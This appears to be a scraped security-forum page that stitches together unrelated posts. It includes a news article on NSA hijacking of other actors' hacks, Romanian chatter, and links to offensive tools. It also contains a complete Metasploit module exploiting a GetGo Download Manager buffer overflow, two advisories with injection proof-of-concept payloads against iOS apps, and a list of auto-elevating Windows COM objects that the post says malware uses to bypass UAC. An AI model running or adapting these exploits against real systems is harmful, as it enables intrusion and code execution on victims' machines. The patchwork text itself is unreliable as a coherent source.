Aerosol

A new wave of documents from Edward Snowden's cache of National Security Agency data published by Der Spiegel demonstrates how the agency has used its network exploitation capabilities both to defend military networks from attack and to co-opt other organizations' hacks for intelligence collection and other purposes. In one case, the NSA secretly tapped into South Korean network espionage on North Korean networks to gather intelligence. The documents were published as part of an analysis by Jacob Appelbaum and others working for Der Spiegel of how the NSA has developed an offensive cyberwarfare capability over the past decade. According to a report by the New York Times, the access the NSA gained into North Korea's networks—which initially leveraged South Korean "implants" on North Korean systems, but eventually consisted of the NSA's own malware—played a role in attributing the attack on Sony Pictures to North Korean state-sponsored actors. Included with the documents released by Der Spiegel are details on how the NSA built up its Remote Operations Center to carry out "Tailored Access Operations" on a variety of targets, while also building the capability to do permanent damage to adversaries' information systems, including internal NSA newsletter interviews and training materials. Also included was a malware sample for a keylogger, apparently developed by the NSA and possibly other members of the "Five Eyes" intelligence community, which was also included in the dump. The code appears to be from the Five Eyes joint program "Warriorpride," a set of tools shared by the NSA, the United Kingdom's GCHQ, the Australian Signals Directorate, Canada's Communications Security Establishment, and New Zealand's Government Communications Security Bureau. It's not clear from the report whether the keylogger sample came from the cache of documents provided by former NSA contractor Edward Snowden or from another source. As of now, Appelbaum and Der Spiegel have not yet responded to a request by Ars for clarification. However, Appelbaum has previously published content from the NSA, including the NSA's ANT catalog of espionage tools, that were apparently not from the Snowden cache. Pwning the pwners The core of the NSA's ability to detect, deceive, block, and even repurpose others' cyber-attacks, according to the documents, are Turbine and Turmoil, components of the Turbulence family of Internet surveillance and exploitation systems. These systems are also connected to Tutelage, an NSA system used to monitor traffic to and from US military networks, to defend against attacks on Department of Defense systems. When an attack on a DoD network is detected through passive surveillance (either through live alerts from the Turmoil surveillance filters or processing by the Xkeyscore database), the NSA can identify the components involved in the attack and take action to block it, redirect it to a false target to analyze the malware used in the attack, or do other things to disrupt or deceive the attacker. This all happens outside of DOD's networks, on the public Internet, using "Quantum" attacks injected into network traffic at a routing point. But the NSA can also use others' cyberattacks for its own purposes, including hijacking botnets operated by other actors to spread the NSA's own "implant" malware. Collection of intelligence of a target using another actor's hack of that target is referred to within the signals intelligence community as "fourth party collection." By discovering an active exploit by another intelligence organization or other attacker on a target of interest, the NSA can opportunistically ramp up collection on that party as well, or even use it to distribute its own malware to do surveillance. In a case study covered in one NSA presentation, the NSA's Tailored Access Office hijacked a botnet known by the codename "Boxingrumble" that had primarily targeted the computers of Chinese and Vietnamese dissidents and was being used to target the DOD's unclassified NIPRNET network. The NSA was able to deflect the attack and fool the botnet into treating one of TAO's servers as a trusted command and control (C&C or C2) server. TAO then used that position of trust, gained by executing a DNS spoofing attack injected into the botnet's traffic, to gather intelligence from the bots and distribute the NSA's own implant malware to the targets. Using QuantumDNS, a DNS injection attack against botnet traffic, the NSA was able to make infected PCs believe its server was part of the command and control network. / The NSA then used its position within the botnet to drop the NSA's own "insert" onto affected computers in the botnet. Spying on spies spying on spies spying... Things get even more interesting in the case of the NSA's urgent need to gather more intelligence from North Korea's networks. In a question-and-answer posting to the NSA's intranet, an NSA employee recounted a "fifth party" collection that occurred when the NSA hacked into South Korea's exploit of North Korean computers—and ended up collecting data from North Korea's hack of someone else: That meant that at one point, the NSA was collecting information via a South Korean implant that had in turn been collected by a North Korean implant. It's not clear whether the NSA's TAO used the existing South Korean malware as an avenue to drop its own, as happened with the "Boxingrumble" botnet. The poster also noted another occasion when, during an attempt to hack into another target they were trying to exploit, the NSA discovered, "there was another actor that was also going against them and having great success because of a zero day they wrote." The NSA captured the zero day exploit in its passive collection and "were able to repurpose it," the NSA employee recounted. "Big win." Source

http://i.imgur.com/3AfIVlH.png Serios ma, de ce ai postat poza cu FB tau? + vii aici sa te lauzi ca dai flood?

Salut si bine ai revenit!

Recomand, acum 1 saptamana am avut nevoie de un logo ( in aproximativ 15 minute l-a terminat ) lucreaza frumos si la un pret destul de mic.

ShellNoob is a writing toolkit, that helps you to writting some shellcodes, converting to different formats, resolving some boring steps. Features: convert shellcode between different formats (currently supported: asm, bin, hex, obj, exe, C, python, ruby, pretty) interactive opcode-to-binary conversion (and viceversa) mode. This is useful when you cannot use specific bytes in the shellcode. resolve syscall numbers and constants (not exactly implemented yet ) portable and easily deployable (it only relies on gcc/as/objdump and python). And it just one python file! in-place development: you run ShellNoob directly on the target architecture! other options: prepend breakpoint, 32bit/64bit switch. read from stdin / write to stdout support (use “-” as filename) Download: https://github.com/reyammer/shellnoob

vFeed framework is an open source naming scheme concept that provides extra structured detailed third-party references and technical characteristics for a CVE entry through an extensible XML schema. It also improves the reliability of CVEs by providing a flexible and comprehensive vocabulary for describing the relationship with other security references and standards Download: https://github.com/toolswatch/vFeed

The Social-Engineer Toolkit is an open-source penetration testing framework designed for Social-Engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time. SET is a product of TrustedSec, LLC - An Information Security consulting firm located in Cleveland, Ohio. Download: https://github.com/trustedsec/social-engineer-toolkit

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and during Penetraion Tests. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage. Download: https://github.com/samratashok/nishang

Description Resolver is a windows based tool which designed to preform a reverse DNS Lookup for a given IP address or for a range of IP’s in order to find its PTR. Updated to Version 1.0.3 added dns records brute force. Download: Resolver | SourceForge.net

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in GetGo Download Manager version 4.9.0.1982 and earlier, caused by an overly long HTTP response header. By persuading the victim to download a file from a malicious server, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Julien Ahrens', # Vulnerability discovery 'Gabor Seljan' # Metasploit module ], 'References' => [ [ 'EDB', '32132' ], [ 'OSVDB', '103910' ], [ 'CVE', '2014-2206' ], ], 'DefaultOptions' => { 'ExitFunction' => 'process', 'URIPATH' => "/shakeitoff.mp3" }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'Space' => 2000 }, 'Targets' => [ [ 'Windows XP SP3', { 'Offset' => 4107, 'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30] } ] ], 'Privileged' => false, 'DisclosureDate' => 'Mar 09 2014', 'DefaultTarget' => 0)) end # # Handle the HTTP request and return a response. # Code borrowed from: msf/core/exploit/http/server.rb # def start_http(opts={}) # Ensture all dependencies are present before initializing HTTP use_zlib comm = datastore['ListenerComm'] if (comm.to_s == "local") comm = ::Rex::Socket::Comm::Local else comm = nil end # Default the server host / port opts = { 'ServerHost' => datastore['SRVHOST'], 'ServerPort' => datastore['HTTPPORT'], 'Comm' => comm }.update(opts) # Start a new HTTP server @http_service = nil rescue end end def on_request_uri(cli, request) print_status("Client connected...") unless request['User-Agent'] =~ /GetGo Download Manager 4.0/ print_error("Sending 404 for unknown user-agent") send_not_found(cli) return end sploit = rand_text_alpha(target['Offset']) sploit << "\x90\x90\xEB\x06" sploit << [target.ret].pack('V') sploit << payload.encoded print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...") resp = create_response(200, sploit) resp.body = "" cli.send_response(resp) close_client(cli) end end Source

Document Title: =============== File Pro Mini v5.2 iOS - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1403 Release Date: ============= 2015-01-15 Vulnerability Laboratory ID (VL-ID): ==================================== 1403 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== Multipurpose, Easy-to-Use and Robust app for files & documents. Import files, documents & media from PC/Mac, email attachments, dropbox, sugarsync, iCloud & Box.net to File Pro along with amazing transfer features of FTP and Wifi. The only documents manager app which includes total security of files along with PDF scanner, Audio Recorder and editing TXT files. Open all kind of file & documents including RAR and CBR files. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/file-pro-mini-ultimate-file/id540971042 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Perception System - File Pro Mini v5.2 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Perception System Product: File Pro Mini - iOS Mobile Web Application (Evereader Wifi-Sharing) 5.3 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ 1.1 A local file include web vulnerability has been discovered in the official Perception System - File Pro Mini v5.2 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The vulnerability is located in the filename value of the `Evereader Wi-Fi Sharing - Index` module. Local attackers are able to manipulate the wifi web interface by usage of the vulnerable upload function. The service does not encode or parse the context of uploaded files. Local attacker are able to manipulate the input of the files to exploit the issue by a POST method request to the wifi web-application interface. The execution of unauthorized local file or path request occurs in the index file dir listing module of the `Evereader Wi-Fi Sharing` application. The request method to inject is POST and the attack vector is located on the application-side of the online-service. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise. Vulnerable Method(s): [+] [POST] Vulnerable Module(s): [+] Upload Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Evereader Wi-Fi Sharing - Index 1.2 A local command/path injection web vulnerabilities has been discovered in the official Perception System - File Pro Mini v5.2 iOS mobile web-application. The vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application. The vulnerability is located in the vulnerable `albumname` value of the `Evereader Wi-Fi Sharing - Index` module. Local attackers are able to inject own malicious system specific commands or path value requests to the vulnerable `albumname` value. The execution of the local command inject occurs in the `Evereader Wi-Fi Sharing - Index` module of file dir index. The attacker is able to manipulate the albumnames in the index module of the application by preparing to change the names via iOS app sync. The encoding and validation of the interface is broken by design because files, folders and other values can be manipulated by sync to compromise the iOS mobile application. The attack vector is on the application-side and the injection requires physical device access and a local low privileged user account. Local attackers are also able to exploit the albumname validation issue in combination with persistent injected script codes to execute different local malicious attack requests. The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.9. Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile iOS application or the connected device components. Request Method(s): [+] [GET] (Execution) Vulnerable Module(s): [+] Albums Vulnerable Parameter(s): [+] albumname Affected Module(s): [+] Evereader Wi-Fi Sharing - Index Proof of Concept (PoC): ======================= 1.1 The local file include web vulnerability can be exploited by local attackers without privileged user account and user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Evereader Wi-Fi Sharing - Index (filename via POST) <a href="/files/%3Cx.png%20 ./[LOCAL FILE INCLUDE VULNERABILITY!]" class="file"><x.png%20 ./[LOCAL FILE INCLUDE VULNERABILITY!]">x.png%20 ./[LOCAL FILE INCLUDE VULNERABILITY!]</a></td> <td class='del'><form action='/files/%3Cx.png%20 ./[LOCAL FILE INCLUDE VULNERABILITY!]' method='post'> <input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a> --- PoC Session Logs [POST] (Injection & Execution) --- Status: 302[Found] POST http://localhost:8080/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[67] Mime Type[text/html] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8080/] Connection[keep-alive] POST-Daten: POST_DATA[-----------------------------167073016026822 Content-Disposition: form-data; name="newfile"; filename="x.png%20 ./[LOCAL FILE INCLUDE VULNERABILITY!]" Content-Type: image/png - Status: 200[OK] GET http://localhost:8080/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://localhost:8080/] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[0] Date[So., 11 Jan. 2015 17:47:19 GMT] Reference(s): http://localhost:8080/files 1.2 The local command inject web vulnerability can be exploited by local attackers with low privileged device user account with physical device access and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Evereader Wi-Fi Sharing - Index (albumname via sync) <table border="0" cellpadding="0" cellspacing="0"> <thead> <tr><th>Name</th><th class="del">Delete</th></tr> </thead> <tbody id="filelist"> <tr><td><a href="/files/%22%3E%3C[LOCAL COMMAND INJECT VULNERABILITY!]%3E" class="file">">[LOCAL COMMAND INJECT VULNERABILITY!]></a></td> <td class='del'><form action='/files/%22%3E%3C[LOCAL COMMAND INJECT VULNERABILITY!]%3E' method='post'> <input name='_method' value='delete' type='hidden'/><input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr> <tr class="shadow"><td><a href="/files/Backup" class="file">Backup</a></td><td class="del"><form action="/files/Backup" method="post"> <input name="_method" value="delete" type="hidden"><input name="commit" value="Delete" class="button" type="submit"></form></td></tr> <tr><td><a href="/files/Recents" class="file">Recents</a></td><td class="del"><form action="/files/Recents" method="post"> <input name="_method" value="delete" type="hidden"><input name="commit" value="Delete" class="button" type="submit"></form></td></tr></tbody> </table> --- PoC Session Logs [GET] (Execution) --- Status: 200[OK] GET http://localhost:8080/files?Sun%20Jan%2011%202015%2018:49:41%20GMT+0100 Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS ] Größe des Inhalts[114] Mime Type[text/plain] Request Header: Host[localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[application/json, text/javascript, */*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://localhost:8080/] Connection[keep-alive] Response Header: Accept-Ranges[bytes] Content-Length[114] Cache-Control[private, max-age=0, must-revalidate] Content-Type[text/plain; charset=utf-8] Date[So., 11 Jan. 2015 17:44:43 GMT] Reference(s): http://localhost:8080/ Solution - Fix & Patch: ======================= 1.1 The local file include web vulnerability can be patched by a secure aprse and encode of the vulnerable filename value in the upload module POST method request. Filter the filenames and restrict the input in the app and in remote requests to prevent local file include attacks. 1.2 To fix the second vulnerability encode and parse the albumname value on sync (PUT) request. Filter the albumname values and restrict the input to disallow special chars and script code tags. Security Risk: ============== 1.1 The security risk of the local file include web vulnerability in the filename value of the upload module is estimated as high. (CVSS 6.6) 1.2 The security risk of the local command injection vulnerability in the albumname value of the index module is estimated as medium. (CVSS 5.9) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Source

Document Title: =============== VeryPhoto v3.0 iOS - Command Injection Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1401 Release Date: ============= 2015-01-13 Vulnerability Laboratory ID (VL-ID): ==================================== 1401 Common Vulnerability Scoring System: ==================================== 5.6 Product & Service Introduction: =============================== VeryPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos, while giving you an unprecedented user experience. No in-app purchase, no functional limitations. album password - effectively protect your privacy. multi-touch browsing - Personalized operation allows you to have a different user experience. professional photo editing features - lets you easily have a professional-grade graphics processing technology. (Copy of the Vendor Homepage: https://itunes.apple.com/de/app/veryphoto-pro-album-password/id720810114 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a local command inject web vulnerability in the official VeryPhoto v3.0 iOS mobile web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-13: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Cheng Chen Product: VeryPhoto - iOS Web Application (WiFi) 3.0 Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A local command inject web vulnerability has been discovered in the official VeryPhoto v3.0 iOS mobile web-application. The vulnerability allows remote attackers to inject own commands by usage of stored manipulated system/device values to compromise the apple mobile iOS application. The command inject vulnerability is located in the vulnerable `albumname` value of the `HTTP Wifi Server`. Local attackers are able to inject own malicious system specific commands or path value requests by usage of the vulnerable `albumname` value. The execution of the command occurs in the `VeryPhoto - File Dir Index Listing` of the http wifi interface application. Attackers are able to manipulate the local albumname values by of the iOS default photo app by rename to execute the commands. The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account. Local attackers are also able to exploit the albumname validation issue in combination with persistent injected script codes. The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6. Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to compromise the mobile iOS application and the connected device components. Request Method(s): [+] [Sync] Vulnerable Module(s): [+] Album Vulnerable Parameter(s): [+] albumname Affected Module(s): [+] VeryPhoto - File Dir Index Listing (http://localhost:8080/) Proof of Concept (PoC): ======================= The local command inject web vulnerability can be exploited by local attackers (network) without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the VeryPhoto Pro Album v3.0 iOS application (https://itunes.apple.com/de/app/veryphoto-pro-album-password/id720810114) 2. Open in the device menu the default photo album app of apple (iphone/ipad) 3. Add a new album and change the name to local command that should be injected 4. Save the settings and open the VeryPhoto Pro Album application 5. Start the Wifi service 6. Surf with a local network device to the local web-server (localhost:8080) Note: The execution of the command inject occurs after the wifi interface index has been visited. The vulnerable value that executes the command is the albumname. 7. Successful reproduce of the local command inject web vulnerability! PoC: Albumname - File Dir Index </script><tr><td height="170" width="150"><p align="center"> <img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[LOCAL COMMAND INJECTION VULNERABILITY!]img%20src=%5C%22x%5C%22%3E%2520%3Ciframe%20src=a%3E%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22 assets-library://group/?id=7BADE58E-C286-43D8-8CE2-4415C4DF35CA&filter=1537%22,%22numberOfImage%22:%220%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center"> <img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22, %22numberOfImage%22:%223%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"> <p align="center"><img src="getCoverImage?%7B%22name%22:%22My%20Photo%20Stream%22,%22type%22:%222%22,%22groupType%22:32,%22url%22:%22 assets-library://group/?id=F8476D51-E4C9-4A2A-948B-2D577719B9C7&filter=1537%22,%22numberOfImage%22:%220%22%7D" onclick="albumClick('2')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20"> <p align="center"><font size="2" face="Courier New">"><img src="x">%20<iframe src="a">>(0)</font></td><td height="20" width="50"></td> <td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(3)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"><font face="Courier New" size="2">My Photo Stream(0)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr> </table> </div> --- PoC Session Logs [GET] (Execution) --- Status: 200[OK] GET http://192.168.2.104:8080/getCoverImage?%7B%22name%22:%22%5C%22%3E%3Cimg%20src=%5C%22x%5C%22%3E%2520%3Ciframe%20src=a%3E%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=7BADE58E-C286-43D8-8CE2-4415C4DF35CA&filter=1537%22,%22numberOfImage%22:%220%22%7D Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[3813] Mime Type[image/x-jpg] Request Header: Host[192.168.2.104:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://192.168.2.104:8080/] Connection[keep-alive] Cache-Control[max-age=0] Response Header: Accept-Charset[utf-8] Content-Length[3813] Content-Type[image/x-jpg] Connection[close] - Response Status: OK[200] GET http://192.168.2.104:8080/x[LOCAL COMMAND INJECTION VULNERABILITY!] Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[unknown] Mime Type[unknown] Request Header: Host[192.168.2.104:8080] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://192.168.2.104:8080/] Reference(s): http://localhost:8080/x http://localhost:8080/getCoverImage Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure encode and parse of the vulnerable `albumname` value. Restrict the albumname value and disallow special charsi to prevent application-side injection attacks. Encode in the file dir index listing the vulnerable output value to prevent the execution of local commands. Security Risk: ============== The security risk of the local command inject web vulnerability in the albumname is estimated as medium. (CVSS 5.6) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Source

List of COM object with enabled elevation. This does not mean they all useful for bypassing UAC or anything like this. Most of them are not. Some of them like Copy/Move/Rename/Delete/Link Object and Shell Security Editor already used by malware. All others need to be investigated, use OleView from Windows SDK for more info. Snapshots taken from clean installs. Windows 7 SP1 x64, 7601 WPD Association LUA Virtual Factory {00393519-3A67-4507-A2B8-85146167ACA7} Virtual Factory for Biometrics {0142e4d1-fb7a-11dc-ba4a-000ffe7ab428} CEIPLuaElevationHelper {01D0A625-782D-4777-8D4E-547E6457FAD5} {08d450b7-f7e5-4424-8229-11888adb7c14} RasDlg LUA {0C3B05FB-3498-40C3-9C03-4B22D735550C} Wireless Setup Class {0c98b8bc-273c-464d-938a-b9709607e137} HNetCfg.FwOpenPort {0CA545C6-37AD-4A6C-BF92-9F7610067EF5} ARP CBS Uninstaller Proxy {0da7bfdf-c0a0-44eb-be82-b7a82c4721de} WUAppElevator class {1138506a-b949-46a7-b6c0-ee26499fdeaf} VistaWUWebControl Class {12a66224-5e8a-4679-8941-0b9b960bf5ea} Virtual Factory for DiagCpl {12C21EA7-2EB8-4B55-9249-AC243DA8C666} SPPLUAObject Class {179CC917-3A82-40E7-9F8C-2FC8A3D2212B} Share Media Settings Writer {19BA17F2-2602-4E77-9027-103894607626} Create New Link {1BA783C1-2A30-4ad3-B928-A9A46C604C28} Lpksetup LUA Elevation {1C749B87-568C-4865-8E73-6413F8372CE6} Shell Indexer Admin Object {1E1714A3-50B9-480b-A94A-636D9A9B56D1} Parental Controls Override {1E5300BE-0762-4527-8140-C0FF22DDFC56} Security Shell Extension {1f2e5c40-9550-11ce-99d2-00aa006e086c} Microsoft Disk Quota UI Elevation Helper {1fb2a002-4c6c-4de7-85c2-cb8db9a4f728} Detection And Sharing {1fda955b-61ff-11da-978c-0008744faab7} Sensors Sensor Configuration Helper {2331D136-E39D-4019-92D6-7CE5579962FB} WUPublishedAppInstallorElevator Class {26D32566-760A-40A2-AA82-A40366528916} FaultrepElevatedDataCollection {2C256447-3F0D-4CBB-9D12-575BB20CDA0A} HNetCfg.FwRule {2C5BC43E-3369-4C33-AB0C-BE9469677AF4} Advanced Indexing Options Dialog Object {2F2165FF-2C2D-4612-87B2-CC8E5002EF4C} HNetCfg.FwMgr {304CE942-6E39-40D8-943A-B913C40C9CD4} CtTuner Class {32BA16FD-77D9-4AFB-9C9F-703E92AD4BFF} Mcx2Install Class {3630AB4B-C0D2-4C1B-B7E7-73A2CF9A4521} Device Pairing Handler Class {383b69fa-5486-49da-91f5-d63c24c8e9d0} Copy/Move/Rename/Delete/Link Object {3ad05575-8857-4850-9277-11b85bdb8e09} CMLUAUTIL {3E000D72-A845-4CD9-BD83-80C07C3B881F} CMSTPLUA {3E5FC7F9-9A51-4367-9063-A120244FBEC7} AccesibilityCplAdmin Class {434A6274-C539-4E99-88FC-44206D942775} Manage Network Names {44C39C96-0167-478F-B68D-783294A2545D} Home Networking Configuration Manager {46C166AA-3108-11D4-9348-00C04F8EEB71} CIEContentAdvisorBroker {46CB32FA-B5CA-8A3A-62CA-A7023C0496C5} RasGcw LUA {4A6B8BAD-9872-4525-A812-71A52367DC17} ERCLuaElevationHelper {4BC67F23-D805-4384-BCA3-6F1EDFF50E2C} Shell Security Editor {4D111E08-CBF7-4f12-A926-2C7920AF52FC} AddMdmObj Class {4DF929E7-4C5E-4587-A598-7ED7B3D6E462} LayerUIPropPage {513D916F-2A8E-4F51-AEAB-0CBC76FB1AF8} Region and Language UAC Elevation {514B5E31-5596-422F-BE58-D804464683B5} FaxCommon Class {59347292-B72D-41F2-98C5-E9ACA1B247A2} Virtual Factory for Display {5D05A4EB-54EA-4B7F-A28D-CE51F6BCBAF2} Mount Point Rename {60173D16-A550-47f0-A14B-C6F9E4DA0831} NAP Elevated class {677126ed-2a91-40ff-8c52-06181c064573} Sensors CPL Change Device Permission LUA Helper {6CE51F75-0448-438e-B9CA-69C352A248A7} Advanced Indexing Options Dialog Object {6D3951EB-0B07-4fb8-B703-7C5CEE0DB578} LAN Connection UI Class {7007ACC5-3202-11D1-AAD2-00805FC1270E} Network Common Connections Ui {7007ACD1-3202-11D1-AAD2-00805FC1270E} Windows SideShow AutoWake Configuration Helper {71B804C5-5577-471D-8FE5-C4A45B654EB8} Sharing Elevated Virtual Factory {72A7994A-3092-4054-B6BE-08FF81AEEFFC} FwCpl LUA {752438CB-E941-433F-BCB4-8B7D2329F0C8} Connect to a Network Projector {76052C5C-2EB4-4C40-B1F1-2A5C8554590A} Sensors CPL Change Description LUA Helper {76AE5F57-B7C9-421f-B55E-FB25144317B6} XWizard Task Stub {777BA815-2498-4875-933A-3067DE883070} XWizard Page Stub {777BA816-2498-4875-933A-3067DE883070} XWizard Virtual Factory {777BA81A-2498-4875-933A-3067DE883070} Private XWizard Registration Manager Class {777BA8F5-2498-4875-933A-3067DE883070} Private XWizard Factory Registration Manager Class {777BA8F9-2498-4875-933A-3067DE883070} Private XWizard Type Registration Manager Class {777BA8FB-2498-4875-933A-3067DE883070} Network and Sharing Center Cpl Elevated Virtual Factory {7A076CE1-4B31-452a-A4F1-0304C8738100} Shell FMIFS Wrapper {7aa7790d-75d7-484b-98a1-3913d022091d} HomeGroup Password {7be73787-ce71-4b33-b4c8-00d32b54bea8} HomeGroup Printing Device Class {7DF8EF76-D449-485f-B4EB-58DC96B31EDB} WlanConn LUA {868A2E25-D6C1-450b-8510-734A4AFEE8BC} Virtual Factory for Usercpl {86d5eb8a-859f-4c7b-a76b-2bd819b7a850} CElevateWlanUi {86F80216-5DD6-4F43-953B-35EF40A35AEE} Virtual Factory for Action Center CPL {8D26D9AA-5DA8-4b95-949A-B74954A229A6} Virtual Factory for Recovery {9200689A-F979-4eea-8830-0E1D6B74821F} Default Location CPL Data Handler LUA Helper {9A630456-078D-43d3-9F1D-DF7A5BC0FA44} Date and Time Properties {9df523b0-a6c0-4ea9-b5f1-f4565c3ac8b8} {A0ADD4EC-5BD3-4f70-A47B-07797A45C635} WlanPref LUA {A25821B5-F310-41BD-806F-5864CC441B78} Microsoft Windows Defender {A2D75874-6750-4931-94C1-C99D3BC9D0C7} Windows Parental Controls {A2D8CFE7-7BA4-4bad-B86B-851376B59134} Virtual Factory for Windows Firewall Cpl {A4B07E49-6567-4FB8-8D39-01920E3B2357} Shell ChkdskEx Dialog {a4c31131-ff70-4984-afd6-0609ced53ad6} Mcx2Uninstall Class {A4E118DF-B9E5-4B42-888C-065CEAF8DDC3} Secure Startup {A7A63E5C-3877-4840-8727-C1EA9D7A4D50} RemMdmObj Class {A9710FB5-1840-4224-BD42-86831E28E43A} MBN Pin Unblock page {b70cc729-28ae-11dd-9676-000000000000} Connection Manager LUA Host Object {BA126F01-2166-11D1-B1D0-00805FC1270E} WlanAdhoc LUA {BB2D41DF-7E34-4F06-8F51-007C9CAD36BE} Virtual Factory for Power Options Control Panel {BBD8C065-5E6C-4e88-BFD7-BE3E6D1C063B} CLSID_PrivJITDebuggingHost {BBE60DE4-551F-444A-81AB-70ADAF417C5D} DfsShellAdmin Class {BCEA735B-4DAC-4B71-9C47-1D560AFD2A9B} Network Center LUA {C0DCC3A6-BE26-4bad-9833-61DFACE1A8DB} WCN Elevation Helper {C100BEBB-D33A-4a4b-BF23-BBEF4663D017} Network Diagnostics Framework {C529C7EF-A3AF-45F2-8A47-767B33AA5CC0} PNPX Association Class {cee8ccc9-4f6b-4469-a235-5a22869eef03} Windows SideShow Device Configuration Helper {D3667F1E-CCB8-4A69-99DF-59A2B2A6753F} 